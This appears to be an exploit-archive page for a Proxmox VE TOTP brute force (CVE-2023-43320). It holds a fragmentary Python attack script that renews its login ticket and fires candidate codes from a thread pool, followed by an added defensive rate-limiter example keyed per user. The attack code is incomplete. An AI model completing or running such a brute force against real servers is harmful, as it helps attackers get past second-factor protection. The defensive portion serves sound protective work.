Proxmox VE TOTP Brute Force Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2024-01-31 |
Type : remote |
Platform : linux
This Proxmox VE TOTP brute force exploit / vulnerability is published for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
# Exploit Title: Proxmox VE TOTP Brute Force
# Date: 09/23/2023
# Exploit Author: Cory Cline, Gabe Rust
# Vendor Homepage: https://www.proxmox.com/en/
# Software Link: http://download.proxmox.com/iso/
# Version: 5.4 - 7.4-1
# Tested on: Debian
# CVE : CVE-2023-43320
import concurrent.futures
import time
import requests
import urllib.parse
import json
import os
import urllib3

# refresh_ticket(), threads and tokens are not defined in this listing.

def attack(token):
    global last_refresh_time
    global auto_refresh_time
    global target_url
    global username
    global password
    global ticket_username
    global ticket_data
    # Renew the authentication ticket once it is older than auto_refresh_time minutes.
    if int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)):
        refresh_ticket(target_url, username, password)
        last_refresh_time = int(time.time())

# Submit every candidate token through a pool of worker threads and wait for all of them.
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
    res = [executor.submit(attack, token) for token in tokens]
    concurrent.futures.wait(res)
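
A defensive counterpart to the listing above, added here as an example and not part of the original exploit or of Proxmox's code: because the script renews its ticket on a timer and submits guesses from a thread pool, a failed-code counter has to be keyed to the user rather than to the ticket and updated under a lock. The class name, the threshold of 8 failures, the one-hour lock and the user `alice@pam` are illustrative assumptions.

```python
import concurrent.futures
import threading
import time


class SecondFactorLimiter:
    """Counts failed TOTP checks per user (hypothetical helper, not Proxmox code)."""

    def __init__(self, max_failures=8, lock_seconds=3600, clock=time.monotonic):
        # Threshold and lock duration are illustrative assumptions.
        self.max_failures = max_failures
        self.lock_seconds = lock_seconds
        self.clock = clock
        self._mutex = threading.Lock()
        self._failures = {}      # username -> consecutive failed codes
        self._locked_until = {}  # username -> clock value when the lock ends

    def check(self, username, verify):
        """Call verify() unless username is locked; no ticket id, so a new ticket resets nothing."""
        with self._mutex:  # serialised so parallel requests cannot overshoot the limit
            now = self.clock()
            until = self._locked_until.get(username)
            if until is not None and now < until:
                return "locked"  # the submitted code is never evaluated
            if verify():
                self._failures.pop(username, None)
                return "ok"
            count = self._failures.get(username, 0) + 1
            self._failures[username] = count
            if count >= self.max_failures:
                self._locked_until[username] = now + self.lock_seconds
                self._failures.pop(username, None)
            return "failed"


def simulate(guesses=200, workers=16):
    """Constructed demo: wrong codes for one user arriving on parallel connections."""
    limiter = SecondFactorLimiter()
    evaluated = []

    def wrong_code():
        evaluated.append(1)  # records that a guess reached the verifier
        return False

    with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda _: limiter.check("alice@pam", wrong_code),
                                range(guesses)))
    return results.count("failed"), results.count("locked"), len(evaluated)
```

Holding one mutex across `verify()` keeps the example short; a production limiter would lock per user and persist the counters so a service restart does not clear them.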